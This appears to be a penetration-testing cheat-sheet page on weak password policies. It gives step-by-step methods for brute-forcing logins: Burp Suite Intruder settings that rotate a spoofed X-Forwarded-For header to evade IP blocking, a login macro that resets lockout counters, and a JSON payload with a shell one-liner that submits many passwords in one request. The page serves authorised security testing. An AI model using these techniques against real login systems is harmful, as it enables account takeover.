- Testing for Weak Password Policy (WSTG-ATHN-07)
- NIST proposes barring some of the most nonsensical password rules (Ars Technica)
Vulnerability description for reporting available in VulnDB (GitHub)
Bruteforcing Passwords
Bruteforce passwords of usernames found during the enumeration phase.
Bypassing IP Blocking
With HTTP Header
- Send the login request to the Intruder module in Burp Suite.
- Add the HTTP header X-Forwarded-For in the request.
- Select Pitchfork as the attack type.
- Use the payload Numbers, set range From 1 To 100, Step to 1, Max fraction digits to 0.
X-Forwarded-For: §dummy§With valid login
The IP can be blocked if you fail to log in too many times. In some implementations, the counter for the number of failed attempts resets if the IP owner logs in successfully. Use a macro and a session handling rule to issue a successful login request before each bruteforce attempt.
- Click on the Settings menu.
- Under Macros, click Add.
- Select the successful login request.
- Give the macro a name (Login).
- Click OK.
- Under Setting handling rules, click Add.
- In the Details tab:
- Under Rule Description, enter a description like Intruder.
- Under Rules Actions, click Add and select Run a macro. Select the macro Login and click OK.
- In the Scope tab:
- Under Tools Scope, select Intruder and unselect the rest.
- Under URL Scope, select Include all URLs.
- Click OK.
- In the Details tab:
- Close the Settings window.
By supplying multiple passwords in one request
{"username":"victim","password":["whatever1","whatever2","whatever3"]}Generate the JSON from a password list:
for pass in $(cat wl.txt); do printf \"${pass}\",; done